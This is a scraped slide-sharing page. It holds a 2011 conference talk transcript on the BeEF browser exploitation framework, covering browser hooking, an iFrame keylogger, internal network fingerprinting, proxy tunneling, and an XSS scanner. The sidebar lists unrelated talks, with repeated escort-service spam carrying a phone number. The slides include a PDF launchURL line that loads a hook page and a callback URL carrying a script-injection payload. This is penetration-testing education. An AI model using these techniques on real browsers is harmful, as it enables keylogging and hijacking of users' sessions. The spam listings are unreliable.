Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 

Recently uploaded (20)

Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 

Be ef presentation-securitybyte2011-michele_orru

  • 1. Ground BeEF: Cutting, devouring and digesting the legs off a browser Michele „antisnatchor” Orru’ 6 September 2011
  • 2. Who am I? ✴ Penetration Tester @ The Royal Bank of Scotland ✴ BeEF developer: Tunneling Proxy, XssRays integration, various exploits, lot of bug-fixing, testing and fun ✴ Kubrick fan ✴ Definitely not a fan of our Italian prime minister Silvio „bunga-bunga” Berlusconi ✴@antisnatchor ✴http://antisnatchor.com
  • 3. Outline ✴ What the hell is BeEF? ✴Cutting Target enumeration and analysis ✴Devouring Internal net fingerprint Exploiting internal services through the hooked browser Keylogging, browser pwnage ✴Digesting Persistence, tunneling sqlmap/Burp through BeEF proxy XSSrays integration ✴Future development and ideas
  • 4. What the hell is BeEF? ✴ BeEF: Browser Exploitation Framework ✴Pioneered by Wade Alcorn in 2005 (public release) ✴Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse ✴Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors. ✴ The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context.
  • 5. What the hell is BeEF?
  • 6. Cutting: Target enum and analysis ✴ Lot of juicy information after first hook initialization : ✴Browser/OS version ✴Cookies ✴Browser plugins ✴Supported features (Google Gears, Web Sockets, Flash, Java, . .) ✴Specific modules are also there to help ✴Detect links/visited URLs ✴Detect social networks (authenticated in Twitter, Gmail, Facebook) and Tor ✴Execute your custom Javascript
  • 7. Cutting: Target enum and analysis
  • 8. Devouring: Internal net fingerprint Recon/NetworkFingerprinting module ✴Knowing the victim internal IP, the attacker can start to fingerprint the internal network via Javascript to find common servers and devices. ✴The approach currently in use is similar to Yokoso (InGuardians) ✴Map of device/application default images ✴img tags are loaded into the victim DOM ✴Onload event, if (image width/height/path == deviceImageMapEntry), then deviceXYZ@IP has been successfully found ✴Watch „Jboss 6.0.0M1 JMX Deploy Exploit: the BeEF way... ” on Vimeo (http://vimeo.com/24410203) for a practical example
  • 9. Devouring: Internal net fingerprint ✴ Great preso „Intranet Footprinting” by Javier Marcos and Juan Galiana (Owasp AppSec Eu 2011) ✴ They developed new BeEF modules ✴They are working with us and their work will be available in BeEF trunk soon. A few examples: ✴Internal DNS enumeration ✴Reliable Port Scanning ✴Ping sweep
  • 10. Devouring: exploiting internal services ✴Network/JbossJmxUploadExploit module ✴JBoss 4.x, 5.1.0, 6.0.0.M1 JMX deploy exploit is available in MSF, but you need to have direct access to the target (or use a host as a pivot) ✴Then why not use the victim browser as a pivot?
  • 11. Devouring: persistent keylogging Persistence/iFrameKeylogger module ✴We can inject a 100% width/height overlay iFrame that loads the login page (in-domain), attaching a listener for keyboard events (keylogger) in JS. ✴After the victim logs in, she will stay in the injected iFrame while the communication channel will be persistent in the background.
  • 12. Devouring: module autorun ✴ We’ve ported back (from the old PHP version) the autorun feature ✴Add autorun: true in the command module config.yaml that you want to autorun ✴When a new browser will be hooked in BeEF, the module will be automatically launched ✴Imagine adding autorun: true in Metasploit autopwn module (another feature ported back)...
  • 13. Digesting: hook default browser ✴Originally disclosed by Billy (xs-sniper) Rios on „Expanding the Attack Surface” Browser/HookDefault module ✴We use a PDF in order to attempt hooking the default browser ✴When executed, the hooked browser will load a PDF in a new window and use that to start the default browser. ✴app.launchURL("http://192.168.56.1/page-With-BeEF-Hook-Js.html",true); ✴If everything will be ok, we hooked the default browser. ✴We are planning to improve it: ✴make the bounce page configurable by the user ✴use a ruby PDF library in order to manipulate the PDF via the web UI
  • 14. Digesting: tunneling proxy ✴Having a communication channel with the hooked browser, we can: ✴Receive requests as a proxy on BeEF ✴Translate these requests to XHRs (in-domain) ✴Parse the XHRs responses and send the data back to the original requestor... ✴Using the victim browser hooked in BeEF as a tunneling proxy, we will see the following scenarios: ✴browsing the authenticated surface of the hooked domain through the security context of the victim browser; ✴spidering the hooked domain through the security context of the victim browser; ✴finding and exploiting SQLi with Burp Pro Scanner + sqlmap (through the victim browser too :-) ).
  • 15. Digesting: tunneling proxy Let see the tunneling proxy in action!
  • 16. Digesting: XssRays ✴ Originally developed by Gareth Heyes in 2009 as a pure JS-based XSS scanner ✴ The XssRays BeEF extension allows you to check if links, forms and URI paths of the page where the browser is hooked are vulnerable to XSS. ✴What XssRays do is basically parse all the links and forms of the page where it is loaded and check for XSS on GET, POST parameters, and also in the URI path. ✴The original code by Gareth, from 2009, used a nice trick (the location.hash fragment) in order to have a sort of callback between parent and child iFrames ✴This is now patched by all recent browsers. So how to check for XSSs cross-domain, respecting the SOP restrictions?
  • 17. Digesting: XssRays ✴We inject a vector that will contact back BeEF if the JS code will be successfully executed (thus, the XSS confirmed). ✴No false positives (oh yes, that’s what I like)! ✴Basically the document.location.href of the injected iFrame that contains the vector will point to a know BeEF resource. The following is an example value of href: ✴http://192.168.84.1:3000/ui/xssrays/rays? hbsess=ZdGQG32VvYmozDP3ia0mvNd5PwcjR9lXuzmTmxm1mAckrgjqA9bIfg41Si2eOfVpviNWYk 9vi2q3kvZB&raysscanid=3&poc=http://192.168.84.128/dvwa/vulnerabilities/xss_r/?name= %22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&&name=Standard%20script%20injection %20double&method=GET ✴Next step is multihooking: hook a browser on multiple domains, to extend the attack surface.
  • 18. Digesting: XssRays in a nutshell
  • 19. Digesting: XssRays in a nutshell
  • 20. Digesting: XssRays in a nutshell
  • 21. Digesting: XssRays in a nutshell
  • 22. Digesting: XssRays in a nutshell
  • 23. Digesting: XssRays in a nutshell
  • 24. Digesting: XssRays in a nutshell
  • 25. Digesting: XssRays in a nutshell
  • 26. Digesting: XssRays in a nutshell
  • 27. Digesting: XssRays in a nutshell
  • 28. Digesting: XssRays in a nutshell
  • 29. Future dev and ideas ✴Improve XssRays: ✴add more attack vectors, more testing ✴add JS depth crawler ✴Multi-hooking: a browser can be hooked on multiple domains ✴Check for time-based blind SQLi cross-domain via JS ✴Improve the BeEF console (command line UI) ✴Well...take a look here: http://code.google.com/p/beef/issues/list
  • 30. Get in touch with us ✴Follow the BeEF: @beefproject ✴Checkout BeEF: http://code.google.com/p/beef/ ✴Check our website: http://beefproject.com ✴Have fun with it ✴We’re hiring!!! (but we’ll not pay you...seriously, we have so many tasks to do, join us)
  • 31. Thanks to ✴Wade Alcorn and the other BeEF ninjas: Ben, Scotty, Christian, Brendan, Saafan,. . ✴My colleagues Piotr & Michal ✴My employer ✴SecurityByte crew and you attendees
  • 32. Questions? Thanks for your time guys ;-)